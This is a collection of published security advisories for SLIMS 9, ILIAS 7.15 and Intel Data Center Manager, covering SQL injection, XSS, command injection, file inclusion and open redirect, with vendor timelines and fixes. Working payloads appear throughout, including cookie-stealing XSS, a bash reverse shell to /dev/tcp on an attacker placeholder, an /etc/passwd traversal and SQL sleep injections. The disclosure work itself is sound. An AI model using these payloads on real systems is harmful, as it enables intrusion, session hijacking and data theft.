Senayan Library Management System version 9.0.l0 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 11.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi## Description:The manual insertion `point 3` with `class` parameter appears to bevulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'was submitted in the manual insertion point 3.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND'dLjf'='dLjf&membershipType=a&collType=aaaa---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)## Proof and Exploit:[href](http://localhost:5001/sy5wji)## Time spent`03:00:00`

Senayan Library Management System 9.0.0 SQL Injection

Senayan Library Management System version 9.0.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9Multiple XSS-Reflected vulnerabilities## Author: nu11secur1ty## Date: 12.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0## Description:The value of the keywords request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks.The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhcwas submitted in the keywords parameter.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhcHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhjuUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywnSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Fri, 09 Dec 2022 06:23:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 29492<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>        <meta name="description" content="Open Source LibraryManagement System | Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)## Proof and Exploit:[href](https://streamable.com/ac60v3)## Time spent`01:00:00`

Senayan Library Management System 9.0.0 Cross Site Scripting

Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Senayan Library Management System 9.4.0 Cross Site Scripting

ILIAS eLearning versions 7.15 and below suffer from authenticated command injection, persistent cross site scripting, local file inclusion, and open redirection vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20221206-0 >  
=======================================================================  
               title: Multiple critical vulnerabilities  
             product: ILIAS eLearning platform  
  vulnerable version: <= 7.15  
       fixed version: 7.16  
          CVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917,  
                      CVE-2022-45918  
              impact: critical  
            homepage: https://www.ilias.de  
               found: 2022-09-30  
                  by: Anna Hartig (Office Bochum)  
                      Constantin Schwarz (Office Bochum)  
                      Niklas Schilling (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Around since 1998, ILIAS is a powerful learning management system that fulfills  
all your requirements. Using its integrated tools, small and large businesses,  
universities, schools and public authorities are able to create tailored,  
individual learning scenarios."

Source: https://www.ilias.de/en/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Direct OS Command Injection - CVE-2022-45915  
ILIAS utilizes several third-party programs to perform tasks like creating PDF  
files or scanning uploaded files for known viruses. These are called using the  
PHP exec() function. In several instances, the arguments passed to the exec()  
function contain user input that is not properly sanitized.  
By performing malicious configuration steps or uploading dangerous files, an  
attacker can execute arbitrary system commands with the rights of the web server  
user (www-data).  
The privilege required for the different instances of command injection range  
from low rights to admin rights.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple stored cross-site scripting vulnerabilities were identified in ILIAS  
course items. These were either achieved by bypassing existing XSS filters or  
simply by exploiting missing input validation altogether. This results in the  
execution of attacker-controlled JavaScript code by the user's browser.  
The attacker requires the right to create course items, e.g., as a tutor of a  
course.

3) Local File Inclusion - CVE-2022-45918  
The included SCORM editor features a debugger that gives authors insights into  
the current SCORM player session, as well as previous sessions. When accessing  
the logs of previous sessions, the debugger fails to validate the requested  
file path, allowing for arbitrary filesystem access.

4) Open Redirect - CVE-2022-45917  
The function shib_logout.php redirects the user to a URL specified in the  
"return" parameter. Since this parameter is not validated, an attacker can use  
it to redirect a victim to an arbitrary website. This is a powerful tool in  
phishing campaigns, as it allows hiding the malicious webpage behind a link that  
looks like it would take you to the real ILIAS webpage.

Proof of concept:  
-----------------  
1) Authenticated Direct OS Command Injection - CVE-2022-45915  
Multiple instances of command injection vulnerabilities were identified:

a) ZIP archive upload  
Normal users with open assessments can submit their solution by uploading a ZIP  
archive. These archives are extracted on the server and scanned for viruses  
recursively. The directory and file names can be used by an attacker to inject  
system commands, e.g., by including a directory with the name  
$(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker  
is able to get a reverse shell on the ILIAS webserver with the rights of the  
web server user (www-data).

b) Media object creation  
ILIAS can be configured so that users can create media objects based on files  
inside an "Upload Directory". Before these objects are created, the files are  
scanned for viruses. The file names can be used by an attacker to inject system  
commands. By placing a file with a name like $(touch /tmp/pwned) inside the  
upload directory and then creating a media object based on it, an attacker is  
able to execute arbitrary system commands with the rights of www-data on the  
server.

c) PDF document creation  
ILIAS provides users the functionality to export content as PDF files. A user  
with admin rights can configure the path to the preferred PDF renderer. An  
attacker can use this parameter to inject system commands. Due to missing  
input validation it is possible to inject multiple commands. The path to  
wkhtmltopdf has to be included in the payload, as ILIAS checks for it. By  
changing the path to:

/usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1";

an attacker can open a reverse shell with the rights of www-data that connects  
to the attacker's machine on port 13373. The reverse shell is initiated when  
the export function is triggered.  
No PDF renderer has to be installed for this vulnerability to be exploitable.

2) Stored Cross-Site Scripting - CVE-2022-45916  
Multiple instances of stored cross-site scripting were identified:

a) Several Stored XSS Attacks in Tests  
An attacker must be able to create new tests in which the JavaScript code will  
be embedded. If a victim then later accesses one of those tests, the XSS payload will  
be triggered. The "Question" input field of a test has a filter in place, which  
correctly removes HTML tags such as <script> or  
<img src="x" onerror="alert(document.cookie)">. By making use of half open HTML  
tags, this filter can be successfully bypassed. E.g.

<img src="x" onerror="alert(document.cookie)"

This half open HTML tag can also be used in the "Introductory Message" of a test  
to trigger an XSS. It's important to end the JavaScript code with a quotation  
mark or space, to properly separate it from successive HTML tags, after it's  
embedded into a test.

Finally, the "Question" input field of the question type "Long Menu" was  
identified to use no filtering at all, resulting in the unrestricted use of  
arbitrary HTML tags such as <script>.

b) Stored XSS in title of course items  
An attacker with rights to create an arbitrary course item can conduct a stored  
XSS attack by setting the title of the element to:

" onclick="alert(document.cookie)"

When a user clicks on the button to the right of the title, the XSS payload is  
triggered.

c) Stored XSS in HTML sites  
An attacker with rights to edit an HTML Learning Module can conduct a stored  
XSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even  
if this behavior is intended, it is insecure and considered bad practice.

3) Local File Inclusion - CVE-2022-45918  
As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS  
platform. An attacker with access to a SCORM player can open the SCORM  
debugger and request the logs of a previous session. By changing the value of  
the "logFile" query parameter of the request, they can read arbitrary  
files of the server's filesystem. For example, to read the passwd file  
on Linux systems, an attacker can change the value of the parameter logfile  
to "../../../../../../../../../etc/passwd".

4) Open Redirect - CVE-2022-45917  
The shib_logout function is vulnerable to an open redirect.  
A URL that successfully uses this vulnerability to redirect to  
"https://www.sec-consult.com" is:

http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com

Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities were identified in ILIAS version 7.14.  
However, a brief analysis of the source code suggests, that several  
vulnerabilities are present in versions dating back to at least 3.8.4.  
Hence it is assumed that most current versions of the product are affected.

The vulnerabilities were partly fixed in version 7.15, a complete patch is  
available with version 7.16.

Vendor contact timeline:  
------------------------  
2022-10-07: Contacting vendor through security@lists.ilias.de  
2022-10-19: Sending initial email again, as the vendor did not yet respond  
2022-10-25: Extending email recipients to info@ilias.de, datenschutz@ilias.de and  
             identified personal email addresses from the vendor's website.  
2022-10-25: Sending the advisory to the provided contact  
2022-10-31: Vendor requests more information  
2022-10-31: Sending detailed PoC  
2022-11-10: Asking for current status  
2022-11-22: Vendor confirms that patches will be available by 2022-11-26  
2022-11-22: Asking about the version numbers of mentioned patches and CVE IDs  
2022-11-23: Vendor provides information about patched versions; CVE IDs will be  
             requested by SEC Consult  
2022-11-24: Vendor releases patched version 7.16  
2022-12-06: Public release of security advisory

Solution:  
---------  
Update ILIAS to version 7.16 or newer from the vendor's website:  
https://docu.ilias.de/goto.php?target=st_229

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF  A. Hartig, C. Schwarz, N. Schilling / @2022

ILIAS eLearning 7.15 Command Injection / XSS / LFI / Open Redirect

Intel Data Center Manager's endpoint at "/DcmConsole/DataAccessServlet?action=getRoomRackData" is vulnerable to an authenticated, blind SQL injection attack when user-supplied input to the HTTP POST parameter "dataName" is processed by the web application. Versions 4.1 and below are affected.

    RCE Security Advisoryhttps://www.rcesecurity.com1. ADVISORY INFORMATION=======================Product:        Intel Data Center ManagerVendor URL:     https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.htmlType:           SQL Injection [CWE-89]Date found:     2022-01-21Date published: 2022-12-01CVSSv3 Score:   9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)CVE:            CVE-2022-212252. CREDITS==========This vulnerability was discovered and researched by Julien Ahrens fromRCE Security.3. VERSIONS AFFECTED====================Intel Data Center Manager 4.1 and below4. INTRODUCTION===============Energy costs are the fastest rising expense for today’s data centers. Intel® DataCenter Manager (Intel® DCM) provides real-time power and thermal consumption data,giving you the clarity you need to lower power usage, increase rack density, andprolong operation during outages.(from the vendor's homepage)5. VULNERABILITY DETAILS========================Intel DCM's endpoint at "/DcmConsole/DataAccessServlet?action=getRoomRackData" isvulnerable to an authenticated, blind SQL Injection when user-supplied input tothe HTTP POST parameter "dataName" is processed by the web application.Since the application does not properly validate and sanitize this parameter, anattacker can inject arbitrary SQL commands against the PostgreSQL backenddatabase server of the web application.Successful exploits can allow an authenticated attacker (the lowest possibleauthorization level "Guest" is sufficient) to read and modify database contentsand execute any system commands on the underlying operating system. This way,the attacker can compromise the system's entire confidentiality, integrity, andavailability.6. PROOF OF CONCEPT===================POST /DcmConsole/DataAccessServlet?action=getRoomRackData HTTP/1.1Host: [ip-address]Cookie: JSESSIONID=[session-id]Content-Length: 153Accept: application/json, text/plain, */*Content-Type: text/plainUser-Agent: Mozilla/5.0Accept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Connection: close{"antiCSRFId":"[your-anti-csrf-id]","requestObj":{"snapshotId":1,"roomId":1,"dataName":"test');SELECT PG_SLEEP(5)--"}}(see the referenced blog post for more details)7. SOLUTION===========Update at least to version 5.0.0.46307.8. REPORT TIMELINE==================2022-01-21: Discovery of the vulnerability2022-01-21: Reported to vendor via their bug bounty program2022-01-21: Vendor response: Sent to "appropriate reviewers"2022-02-08: Vendor acknowledges the vulnerability with a severity of "medium" without sharing their CVSS calculation2022-02-15: Endless back-and-forth discussions about the rating. Vendor proposes a rating of 6.82022-02-16: I don't accept the rating because the vendor downplayed it2022-02-25: After discussions, vendor rates issue as CVSS 9.0 (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)2022-02-25: Apparently AV:A is still wrong, but I don't have more energy to fight them. However this advisory contains the proper CVSS rating.2022-xx-xx: Vendor releases version 5.0.0.46307 which includes the 